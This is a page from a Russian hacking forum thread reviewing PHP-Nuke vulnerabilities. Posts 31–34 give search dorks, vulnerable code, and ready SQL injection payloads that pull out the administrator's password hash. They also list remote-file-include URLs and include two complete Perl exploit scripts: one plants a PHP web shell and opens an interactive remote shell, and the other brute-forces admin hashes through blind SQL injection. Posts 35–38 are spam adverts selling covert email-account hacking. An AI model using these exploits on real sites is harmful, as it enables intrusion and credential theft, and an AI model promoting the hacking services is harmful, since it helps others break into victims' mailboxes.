ГлавнаяРегистрацияВход
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 3 из 3
  • «
  • 1
  • 2
  • 3
Проверка сайта на уязвимости! » Форум » Уязвимости » Обзор уязвимостей PHP-Nuke
Обзор уязвимостей PHP-Nuke
DecideДата: Среда, 14.11.2012, 11:31 | Сообщение # 31
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
язвимый продукт: PHP-NUKE module video stream
Версия: 4.53
Дорк: inurl:name=Video_Stream

SQL-injections

Уязвимость в файле: watch.php
PHP код:
$id = $_GET['id'];
$request = $_GET['request'];

if($id == "request") {
// Gets the data of request video **FOR ADMIN**
$result = $db->sql_query("SELECT * FROM ".$prefix."_video_stream WHERE id='$request'");
$row = $db->sql_fetchrow($result);
} else {
// Check if category is adult category and requires user to accept disclaimer or if required ofr the user to be registered
adultcategory($id);
// Add user point for veiwing video
userpointsVS(1);
// adds a view to the video
$result = $db->sql_query("SELECT * FROM ".$prefix."_video_stream WHERE id='$id'");
$row = $db->sql_fetchrow($result);
$v = $row['views'];
$v++;
$result = $db->sql_query("UPDATE ".$prefix."_video_stream SET views='$v' WHERE id='$id'");
// Gets the data of that video
$result = $db->sql_query("SELECT * FROM ".$prefix."_video_stream WHERE id='$id'");
$row = $db->sql_fetchrow($result);
}

Как видим здесь присутствуют сразу несколько sql-inj
Примеры запросов:
Код:
/modules.php?name=Video_Stream&page=watch&id=11'%0aunion+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16%23
/modules.php?name=Video_Stream&page=watch&id=request&request=11'%0aunion+select+1,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16%23

Уязвимость в файле: broken.php
PHP код:
if($_POST['Submit']) {
OpenTable();
$usernameb = $_POST['username'];
$user_emailb = $_POST['user_email'];
$result = $db->sql_query("INSERT INTO ".$prefix."_video_stream_broken (username, email, brokenvidid) VALUES('$usernameb', '$user_emailb', '$id') ");

Пример запроса:
Код:
POST /phpnuke/modules.php?name=Video_Stream&page=broken&id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Keep-Alive: 300
Connection: keep-alive
Referer: http://localhost/phpnuke....dname=3
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
username=',if(1=1,BENCHMARK(1559911,MD5(NOW())),1) ,1)/*&user_email=ad%40a.ru&Submit=Submit

Уязвимость в файле: search.php
В этом модуле присуствуют сразу несколько sql-inj

Примеры запросов:
1. /phpnuke/modules.php?name=Video_Stream&page=search
в поле search:
Код:
44' union/**/select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16/*

2.
Код:
POST /phpnuke/modules.php?name=Video_Stream&page=search HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer: http://localhost/phpnuke/modules.php?name=Video_Stream&page=search
Content-Type: application/x-www-form-urlencoded
Content-Length: 138
PHPSESSID=1960d2f98b8657b6e5bdf140c2f8c8ec&orderby=0&categoryby=31' union/**/select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16%23&sortvids=Sort

Уязвимость в файле: comment.php
PHP код:
$commenttopost = $_POST['comment'];
// Check if no comment
if($commenttopost == "") {
die(""._NOCOMMENTENT."");
}
$date = date("h:i A dS M Y");

$username = $looker;

// Strips out HTML and Censored Words
filter_text($commenttopost, 'nohtml');
// **********************************
userpointsVS(2);
$result = $db->sql_query("INSERT INTO ".$prefix."_video_stream_comments (vidid, user, date, comment) VALUES ('$id', '$username', '$date', '$EditedMessage') ");

в куки кидаем:
Код:
id=СУЩЕСТВУЮЩИЙ_ID', 'admin', '12:02 AM 15th Dec 2008',(select concat(aid,0x3a,pwd) from nuke_authors limit 0,1))/*

В результате получим комментарий содержащий aid:hash администратора
 
DecideДата: Среда, 14.11.2012, 11:32 | Сообщение # 32
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
Уязвимый продукт: PHP-NUKE module auktion
Версия: 2.0
Дорк: inurl:modules.php?name=auktion

SQL-injections

В модуле отсутствует какая-либо защита от sql-inj, уязвимости присуствуют почти во всех файлах

Примеры запросов:
Код:
/modules.php?name=auktion&file=viewitem&item=4%0aunion+select+1,2,3,4,5,6,7,8,9,0,11,12,13 ,14,15,16,17,18,19,20,21
/modules.php?name=auktion&file=catlist&catid=29'%0aunion+select+1,2,3,4,5,6,7%23
/modules.php?name=auktion&file=searchit&query='%0aunion+select+1,2,3,4,5,6,7/*
/modules.php?name=auktion&file=edititem&item=-3'%0aunion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21%23

Код:
POST /modules.php?name=auktion&file=edititem HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127
Keep-Alive: 300
Connection: keep-alive
Referer: http://localhost/nuke81/modules.php?name=auktion&file=edititem&item=3
Cookie: lang=english; admin=YWRtaW46OTZlNzkyMTg5NjVlYjcyYzkyYTU0OWRkNWEz MzAxMTI6; user=MjphZG1pbjo5NmU3OTIxODk2NWViNzJjOTJhNTQ5ZGQ1Y TMzMDExMjoxMDo6MDowOjA6MDo6NDA5Ng%3D%3D;
Content-Type: application/x-www-form-urlencoded
Content-Length: 105
name=auktion&file=update&item=3&desc=4',title=(select concat(aid,0x3a,pwd) from nuke_authors limit 0,1)/*
 
DecideДата: Четверг, 15.11.2012, 09:37 | Сообщение # 33
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
Инклуды:
http://www.site.com/modules....=shell?
http://www.site.com/modules....=shell?
http://www.site.com/modules....=shell?
http://www.site.com/modules....=shell?
http://www.site.com/modules....=shell?
http://www.site.com/modules....=shell?
http://www.site.com/modules....=shell?
http://www.site.com/modules....=shell?
http://www.site.com/modules....=shell?
http://www.site.com/modules....=shell?
http://www.site.com/modules....=shell?
http://www.site.com/modules....=shell?
http://www.site.com/modules....=shell?
http://www.site.com/modules....=shell?
http://www.site.com/modules....=shell?
http://www.site.com/modules....=shell?
http://www.site.com/modules....=shell?
http://www.site.com/modules....=shell?
 
DecideДата: Четверг, 15.11.2012, 09:38 | Сообщение # 34
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
Topic : Php-Nuke
Bug type : Local File Include Vulnerability
Author : ItSecTeam
===================== Content ======================
( # Advisory Content : Php-Nuke Lastest Version
( # Mail : Bug@ItSecTeam.com
( # Dork : Php-Nuke Lastest Version
( # We Are : M3hr@n.S , 0xd41684c654 And All Team Members!
( # Find By : Amin Shokohi(Pejvak!)
( # Published: 2010-03-14
=================================================
============================================= Exploit =======================================
( * http://Site.cOm/PHP-Nuke/modules.php?view=0&name=Folder Name&file=File Name
( Ex : http://Site.cOm/PHP-Nuk....e=panel
================================================== =================================

# PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit
# Author/s: Dante90 & yawn
# Contact Us: www.unitx.net
# Requirements: magic_quotes_gpc : off
# Greetings: #0day@irc.iside.us | #Unit-X@irc.unitx.net
# You will remember, Watson, how the dreadful business of the
# Abernetty family was first brought to my notice by the depth which the
# parsley had sunk into the butter upon a hot day.
# -- Sherlock Holmes

Code
use strict;  
use warnings;  
use LWP::UserAgent;  
use HTTP::Cookies;  
sub Nuke::Usage {  
     print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit\n";  
     print " ------------------------------------------------------ \n";  
     print " * USAGE:                    *\n";  
     print " * cd [Local Disk]:\\                    *\n";  
     print " * perl name_exploit.pl [host] [username] [password]  *\n";  
     print " * -> REMEMBER TO ADD THE FINAL / TO THE HOSTNAME <-  *\n";  
     print " ------------------------------------------------------ \n";  
     print " *             Powered By Dante90 & yawn              *\n";  
     print " *                  www.unitx.net                  *\n";  
     print " ------------------------------------------------------ \n";  
}  
#VARS  
system $^O eq 'MSWin32' ? 'cls' : 'clear';  
Nuke::Usage();  
my $host = shift || die;  
my $cmd;  
my $shell = "<?php echo system(\$_GET[\"cmd\"]); ?>"; # Change Here to  
Set your custom shell (for example use system() );  
my $cookies = HTTP::Cookies->new;  
my $request = LWP::UserAgent->new;  
$request->agent("Mozilla 5/0");  
$request->cookie_jar($cookies);  
#END VARS  
sub Full_Path_Disclosure() {  
     my $Get = $request->get($host.'themes/NukeNews/theme.php');  
     if ($Get->content =~ /No such file or directory in <b>(.+?)</b> on line/i) {  
         return $1;  
     } else {  
         return "failed";  
     }  
}  
print " * Getting Full Path\n";  
my $path = Full_Path_Disclosure();  
die " * Failed Path Extraction" if ($path eq "failed");  
$path =~ s/themes(/|)NukeNews(/|)theme.php//g;  
print " * Full Path Found: $path\n";  
if ($path =~ m//) {  
     $path =~ s///g;  
}  
print " * Injecting Shell To $host\n";  
my $req2= $request->post($host."modules.php?name=Your_Account&op=activate&username=WTF",  
     {  
         check_num => "'UNION/**/SELECT 1,2,3,4,5,6,'".$shell."' FROM  
`nuke_authors` INTO OUTFILE '$path"."rce.php",  
     },  
     Referer => $host."index.php");  
print " * Injecting Successfully Completed\n";  
print " * Shell now available on $host"."rce.php\n";  
print " * Connecting to remote shell\n";  
sleep(4);  
print " * Connected.. Type \"quit\" to quit\n";  
while() {  
         print "* root\@backdoor ~\$ ";  
         $cmd = <>;  
         chomp($cmd);  
         last if $cmd eq "quit";  
         $req2 = $request->get($host."/rce.php?cmd=".$cmd);  
         print $req2->content."\n";  
}


# [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection
# Date: 2010.07.04 after 50 days the bug was discovered.
# Author/s: Dante90, WaRWolFz Crew
# Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770,
# Shades Master, V1R5, yeat
# Special Greetings To: The:Paradox
# Greetings To: Shotokan-The Hacker, _mRkZ_, h473
# Web Site: www.warwolfz.org
# My Wagend (Dante90): dante90wwz.altervista.org
# ----
# Why have I decided to publish this?
# Because some nice guys (Dr.0rYX and Cr3w-DZ) have ripped and published
# my own exploit, with their names.
# FU**ING LAMERS / RIPPERS / SCRIPT KIDDIE
# ----

Code
#!/usr/bin/perl  
# [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection  
# Date: 2010.07.04 after 50 days the bug was discovered.  
# Author/s: Dante90, WaRWolFz Crew  
# Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770,  
#               Shades Master, V1R5, yeat  
# Special Greetings To: The:Paradox  
# Greetings To: Shotokan-The Hacker, _mRkZ_, h473  
# Web Site: www.warwolfz.org  
# My Wagend (Dante90): dante90wwz.altervista.org  
# ----  
# Why have I decided to publish this?  
# Because some nice guys (Dr.0rYX and Cr3w-DZ) have ripped and published  
# my own exploit, with their names.  
# FU**ING LAMERS / RIPPERS / SCRIPT KIDDIE  
# ----  
use strict;  
use warnings;  
use LWP::UserAgent;  
use HTTP::Cookies;  
use HTTP::Headers;  
use Time::HiRes;  
my $Victime  = shift or &usage;  
my $Hash = "";  
my ($Referer,$Time,$Response);  
my ($Start,$End);  
my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,10  2);  
my $HostName = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link  
my $Method = HTTP::Request->new(POST => $HostName.'modules.php?name=Downloads&d_op=Add');  
my $Cookies = new HTTP::Cookies;  
my $UserAgent = new LWP::UserAgent(  
             agent => 'Mozilla/5.0',  
             max_redirect => 0,  
             cookie_jar => $Cookies,  
             default_headers => HTTP::Headers->new,  
         ) or die $!;  
my $WaRWolFz = "http://www.warwolfz.org/";  
my $DefaultTime = request($WaRWolFz);  
my $Post;  
sub Blind_SQL_Jnjection {  
     my ($dec,$hex,$Victime) = @_;  
     return "http://www.warwolfz.org/' UNION/**/SELECT IF(SUBSTRING(pwd,${dec},1)=CHAR(${hex}),benchmark(  250000000,CHAR(0)),0) FROM nuke_authors WHERE aid='${Victime}";  
}  
for(my $I=1; $I<=32; $I++){ #N Hash characters  
     for(my $J=0; $J<=15; $J++){ #0 -> F  
         $Post = Blind_SQL_Jnjection($I,$chars[$J],$Victime);  
         $Time = request($Post);  
         sleep(3);  
         refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I);  
         if ($Time > 4) {  
             $Time = request($Post);  
             refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I);  
             if ($Time > 4) {  
                 syswrite(STDOUT,chr($chars[$J]));  
                 $Hash .= chr($chars[$J]);  
                 $Time = request($Post);  
                 refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I);  
                 last;  
             }  
         }  
     }  
     if($I == 1 && length $Hash < 1 && !$Hash){  
         print " * Exploit Failed                    *\n";  
         print " -------------------------------------------------------- \n";  
         exit;  
     }  
     if($I == 32){  
         print " * Exploit Successfully Executed                        *\n";  
         print " -------------------------------------------------------- \n";  
         system("pause");  
     }  
}  
sub request{  
     $Post = $_[0];  
     $Start = Time::HiRes::time();  
     my $Response = $UserAgent->post($HostName.'modules.php?name=Downloads&d_op=Add', {  
                     title => "Dante90",  
                     url => $Post,  
                     description => "WaRWolFz Crew",  
                     auth_name => "Dante90",  
                     email => "dante90.dmc4\@hotmail.it",  
                     filesize => "1024",  
                     version => "1",  
                     homepage => "http://www.warwolfz.org/",  
                     d_op => "Add"  
                 },  
                 Referer => $HostName.'modules.php?name=Downloads&d_op=Add');  
     $Response->is_success() or die "$HostName : ", $Response->message, "\n";  
     $End = Time::HiRes::time();  
     $Time = $End - $Start;  
     return $Time;  
}  
sub usage {  
     system("cls");  
     {  
         print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploit\n";  
         print " -------------------------------------------------------- \n";  
         print " * USAGE:                    *\n";  
         print " * cd [Local Disk]:\\[Directory Of Exploit]\\             *\n";  
         print " * perl name_exploit.pl [victime]                       *\n";  
         print " -------------------------------------------------------- \n";  
         print " *          Powered By Dante90, WaRWolFz Crew           *\n";  
         print " *  www.warwolfz.org - dante90_founder[at]warwolfz.org  *\n";  
         print " ------------------------------------------------------- \n";  
     };  
     exit;  
}  
sub refresh {  
     system("cls");  
     {  
         print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploit\n";  
         print " -------------------------------------------------------- \n";  
         print " * USAGE:                    *\n";  
         print " * cd [Local Disk]:\\[Directory Of Exploit]\\             *\n";  
         print " * perl name_exploit.pl [victime]                       *\n";  
         print " -------------------------------------------------------- \n";  
         print " *          Powered By Dante90, WaRWolFz Crew           *\n";  
         print " *  www.warwolfz.org - dante90_founder[at]warwolfz.org  *\n";  
         print " ------------------------------------------------------- \n";  
     };  
     print " * Victime Site: " . $_[0] . "\n";  
     print " * Default Time: " . $_[1] . " seconds\n";  
     print " * BruteForcing Hash: " . chr($_[2]) . "\n";  
     print " * BruteForcing N Char Hash: " . $_[5] . "\n";  
     print " * SQL Time: " . $_[4] . " seconds\n";  
     print " * Hash: " . $_[3] . "\n";  
}  
#WaRWolFz Crew
 
reversДата: Четверг, 25.05.2017, 09:20 | Сообщение # 35
Рядовой
Группа: Пользователи
Сообщений: 7
Репутация: 0
Статус: Offline
++++ ВНИМАНИЕ! ВНИМАНИЕ! ВНИМАНИЕ! +++++

ВАМ НУЖЕН АНОНИМНЫЙ ВЗЛОМ ПОЧТЫ?
ВЫ ХОТИТЕ ЧТОБЫ ХОЗЯИН ПОЧТЫ НИ О ЧЕМ НЕ УЗНАЛ?
ВАМ НУЖНЫ КАЧЕСТВЕННЫЕ ДОКАЗАТЕЛЬСТВА ВЗЛОМА ПОЧТЫ?
ВЫ СОМНЕВАЕТЕСЬ ЗАКАЗЫВАТЬ У КОГО ТО?


МЫ ВАМ ПОМОЖЕМ!
ЧТО МЫ ПРЕДЛАГАЕМ:

  • ВЗЛОМ ПОЧТЫ БЕЗ ПРЕДОПЛАТЫ, ОПЛАТА ТОЛЬКО ПО ФАКТУ

  •  ВЗЛОМ ПОЧТЫ БЕЗ ИЗМЕНЕНИЯ ПАРОЛЯ, ЖЕРТВА НИЧЕГО НЕ УЗНАЕТ

  •  МЫ ПРЕДОСТАВИМ ЛЮБЫЕ ДОКАЗАТЕЛЬСТВА КАКИЕ ПОПРОСИТЕ

  •  МЫ ЛОМАЕМ АНОНИМНО, НИ КАКИХ ВАШИХ ДАННЫХ НЕ НУЖНО

  •  МЫ БЕРЕМСЯ ЗА РАБОТУ СРАЗУ КАК ТОЛЬКО ПОЛУЧАЕМ ЗАКАЗ, НЕ НУЖНО ЖДАТЬ ПОДТВЕРЖДЕНИЯ

  •  ОПЛАТИТЬ МОЖНО НЕ ИМЕЯ КОШЕЛЬКА \СЧЕТА

  • КОНСУЛЬТИРОВАНИЕ СВОИХ КЛИЕНТОВ ПОСЛЕ ВЫПОЛНЕННОГО ЗАКАЗА

  • ПОМОГАЮ С БЕЗОПАСНОСТЬЮ ПРИ ПРОСМОТРЕ ЧУЖИХ ПОЧТОВЫХ ЯЩИКОВ

    Код
    Mail.ru
    Yandex.ru
    Rambler.ru
    Gmail.com
    Корпоративные почтовые ящики тоже ломаем.


    НАШИ КОНТАКТЫ
    САЙТ: WWW.POCHTY.COM
    ICQ: 318-319

    =
    =
    =
    =
    =
    =
    =
    =
    =
    =
    =
    =
    =
    =
    =
    =
    =
    =
    =
  •  
    uawadДата: Пятница, 04.08.2017, 02:26 | Сообщение # 36
    Рядовой
    Группа: Пользователи
    Сообщений: 6
    Репутация: 0
    Статус: Offline
    ПРЕДЛАГАЕМ УСЛУГИ ПО ВЗЛОМУ ПОЧТОВЫХ ЯЩИКОВ


    Самые низкие цены?

    Любые доказательства взлома?

    Без смены пароля, пароль при взломе не меняется
    ?
    Сроки взлома от супер срочного до 7и дней?

    Анонимность гарантию 1000%?

    Гарантия от смены пароля?

    Оплатить взлом почты можно в любом терминале?

    Цитата

    Mail.ru
    Yandex.ru
    Rambler.ru
    Gmail.com
    Корпоративные почтовые ящики тоже ломаем.

     

    1) НИКАКОЙ ПРЕДОПЛАТЫ, ОПЛАТА ТОЛЬКО ПО ФАКТУ ВЗЛОМА
    2) ЛЮБЫЕ ДОКАЗАТЕЛЬСТВА ВЗЛОМА, обговаривается индивидуально (скриншот, чтение письма, смена информации)
    3) ПАРОЛЬ ПРИ ВЗЛОМЕ НЕ МЕНЯЕТСЯ, ЖЕРТВА НИ ЧЕГО НЕ ЗАПОДОЗРИТ
    4) АНОНИМНОСТЬ, НИ КАКИХ ЛИЧНЫХ ДАННЫХ. КОНФИДЕНЦИАЛЬНО НА ВСЕ 1000%
    5) ОПЛАТИТЬ МОЖНО В ЛЮБОМ ТЕРМИНАЛЕ, НЕ ИМЕЯ СВОЕГО КОШЕЛЬКА
    6) КОНСУЛЬТИРОВАНИЕ СВОИХ КЛИЕНТОВ ПОСЛЕ ВЫПОЛНЕННОГО ЗАКАЗА
    7) ПОМОГАЮ С БЕЗОПАСНОСТЬЮ ПРИ ПРОСМОТРЕ ЧУЖИХ ПОЧТОВЫХ ЯЩИКОВ


    бесплатно не работаем. скидки после 2х заказов.
    доказательства скрин, чтение вашего письма, смена данных на время, и д.р.


    ДЛЯ СВЯЗИ И ЗАКАЗОВ:
    ICQ:318-319
    сайт http://pochty.com


     
     
    qa_joplДата: Среда, 09.08.2017, 16:40 | Сообщение # 37
    Рядовой
    Группа: Пользователи
    Сообщений: 15
    Репутация: 0
    Статус: Offline
    ++++ ВНИМАНИЕ! ВНИМАНИЕ! ВНИМАНИЕ! +++++

    ВАМ НУЖЕН АНОНИМНЫЙ ВЗЛОМ ПОЧТЫ?
    ВЫ ХОТИТЕ ЧТОБЫ ХОЗЯИН ПОЧТЫ НИ О ЧЕМ НЕ УЗНАЛ?
    ВАМ НУЖНЫ КАЧЕСТВЕННЫЕ ДОКАЗАТЕЛЬСТВА ВЗЛОМА ПОЧТЫ?
    ВЫ СОМНЕВАЕТЕСЬ ЗАКАЗЫВАТЬ У КОГО ТО?


    МЫ ВАМ ПОМОЖЕМ!
    ЧТО МЫ ПРЕДЛАГАЕМ:

  • ВЗЛОМ ПОЧТЫ БЕЗ ПРЕДОПЛАТЫ, ОПЛАТА ТОЛЬКО ПО ФАКТУ

  •  ВЗЛОМ ПОЧТЫ БЕЗ ИЗМЕНЕНИЯ ПАРОЛЯ, ЖЕРТВА НИЧЕГО НЕ УЗНАЕТ

  •  МЫ ПРЕДОСТАВИМ ЛЮБЫЕ ДОКАЗАТЕЛЬСТВА КАКИЕ ПОПРОСИТЕ

  •  МЫ ЛОМАЕМ АНОНИМНО, НИ КАКИХ ВАШИХ ДАННЫХ НЕ НУЖНО

  •  МЫ БЕРЕМСЯ ЗА РАБОТУ СРАЗУ КАК ТОЛЬКО ПОЛУЧАЕМ ЗАКАЗ, НЕ НУЖНО ЖДАТЬ ПОДТВЕРЖДЕНИЯ

  •  ОПЛАТИТЬ МОЖНО НЕ ИМЕЯ КОШЕЛЬКА \СЧЕТА

  • КОНСУЛЬТИРОВАНИЕ СВОИХ КЛИЕНТОВ ПОСЛЕ ВЫПОЛНЕННОГО ЗАКАЗА

  • ПОМОГАЮ С БЕЗОПАСНОСТЬЮ ПРИ ПРОСМОТРЕ ЧУЖИХ ПОЧТОВЫХ ЯЩИКОВ

    Код
    Mail.ru
    Yandex.ru
    Rambler.ru
    Gmail.com
    Корпоративные почтовые ящики тоже ломаем.


    НАШИ КОНТАКТЫ
    САЙТ: WWW.POCHTY.COM
    ICQ: 318-319
  •  
    greval2008Дата: Вторник, 12.12.2017, 19:22 | Сообщение # 38
    Рядовой
    Группа: Пользователи
    Сообщений: 6
    Репутация: 0
    Статус: Offline
    ++++++++++++++  ПРОВЕРЕННЫЙ СЕРВИС ++++++++++++++ 
    ВЗЛАМЫВАЕМ ЛЮБЫЕ ПОЧТЫ
    ВЗЛАМЫВАЕМ 24 ЧАСА В СУТКИ

    ЛОМАЕМ ДАЖЕ ТЕ ПОЧТЫ ОТ КОТОРЫХ ОТКАЗАЛИСЬ ДРУГИЕ ВЗЛОМЩИКИ

    ВОССТАНАВЛИВАЕМ ЗАБЫТЫЕ ПАРОЛИ


    Цитата
    НАШ САЙТ WWW.XAKMAIL.COM


    ЛОМАЕМ ПОЧТЫ ЛЮБЫХ СЕРВИСОВ

    САМЫЕ НИЗКИЕ ЦЕНЫ
    ЛЮБЫЕ ГАРАНТИИ
    ЛЮБЫЕ ДОКАЗАТЕЛЬСТВА
    СКИДКИ И БОНУСЫ

    ВЫ ВСЕ ЕЩЕ ИЩИТЕ ПРОВЕРЕННОГО ВЗЛОМЩИКА?
    ЗАКАЖИТЕ У НАС! УБЕДИТЕСЬ!И БУДИТЕ ПОСТОННЫМ КЛИЕНТОМ!

    ЗАПИШИТЕ + ЗАПОМНИТЕ + ЗАХОДИТЕ    
    www.XakMail.com


    взлом почты, e-mail, подобрать пароль к ящику, пароля почтового ящика, ящика, паролей, посмотреть переписку, недорого заказ взломать мыла заказать, профессиональный, мыло, вскрыть, недорого, дешевый, быстро, анонимно, низкие, цены, stealth, e-mail, hacker, group, mail-psw, com, mail. ru, маил. ру, мой мир, получит, доступ, яндекс, рамблер, гмаил, серсив, пасс, аккаунтов, мейла, gmail, rambler, yandex, yahoo

     
    Проверка сайта на уязвимости! » Форум » Уязвимости » Обзор уязвимостей PHP-Nuke
    • Страница 3 из 3
    • «
    • 1
    • 2
    • 3
    Поиск:

    Пятница, 07.10.2022, 13:21
    Copyright MyCorp © 2022Бесплатный хостинг uCoz